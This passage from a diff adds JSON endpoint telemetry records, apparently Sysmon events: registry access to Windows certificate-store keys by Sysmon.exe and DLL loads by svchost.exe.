"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570880900000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "StateRepository.Core.dll", + "image_path": "C:\\Windows\\System32\\StateRepository.Core.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570878860000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570880900000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570880900000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570880900000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570881050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570881050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570881050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570881050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570881050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570881050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570881050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570881050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570881050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570881050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570881050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570881050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570881050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570881050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570881050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570881050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570881050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570881050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570881050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570881050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570881050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570881050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570881050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "Windows.Storage.OneCore.dll", + "image_path": "C:\\Windows\\System32\\Windows.Storage.OneCore.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570879020000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570881050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570881050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570881050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570881050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570881050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570881050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570881050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570881050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570881050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570881050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570881050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570881050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570881050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570881050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570881050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570881050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570881050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570881050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570881050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570881050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570881050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570881050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570881050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570881050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570881050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570881050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "WsmAuto.dll", + "image_path": "C:\\Windows\\System32\\WsmAuto.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570879640000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570881050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570881050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570881210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570881210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570881210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570881210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570881210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570881210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": 